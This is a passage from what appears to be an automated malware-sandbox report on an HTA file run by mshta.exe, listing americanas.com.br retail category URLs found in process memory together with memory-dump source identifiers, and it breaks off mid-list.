Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-estar/rack-com-painel
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750307387.000000000AA36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775048754.000000000AA39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sala-de-jantar?chave=pfm_hm_tt_1_0_sala-de-jantar
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666676210.000000000C132000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofa
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2713822751.0000000009A59000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770422568.000000000929A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708803220.0000000009A58000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A57000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveis
Source: mshta.exe, 00000000.00000003.2533905851.000000000DD25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=dk_hm_at_moveismeta.largemeta.large.heightmeta.
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776665424.000000000C11F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667189470.000000000C11D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668732416.000000000C11F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_hm_tt_1_0_moveis
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_hm_tt_1_0_moveisAg
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/moveis?chave=pfm_home_moveis_menu
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelaria
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelaria)g
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=dk_hm_at_papelaria-f
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665727744.000000000C113000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665620808.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/papelaria?chave=pfm_home_papelaria_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/pc-gamer?chave=pfm_home_pcgamer_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658032255.00000000092B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/pet-shop?chave=pfm_home_petshop_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658292979.0000000003378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.000000000336A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747968255.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2765719416.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/relogios-e-joias/relogios?chave=pfm_home_relogios_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/relogios-e-joias/relogios?chave=pfm_home_relogios_menuS
Source: mshta.exe, 00000000.00000003.2676562635.000000000AA1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/saude
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667416562.000000000A88F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774190260.000000000A890000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/saude-e-bem-estar?chave=pfm_home_saude_menu
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669963998.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/sinalizacao-e-seguranca?chave=pfm_home_sinalizacao_menu
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/sinalizacao-e-seguranca?chave=pfm_home_sinalizacao_menum
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664940461.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716782602.0000000009A98000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642469328.0000000009A93000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669695737.00000000093B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708989792.0000000009A97000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 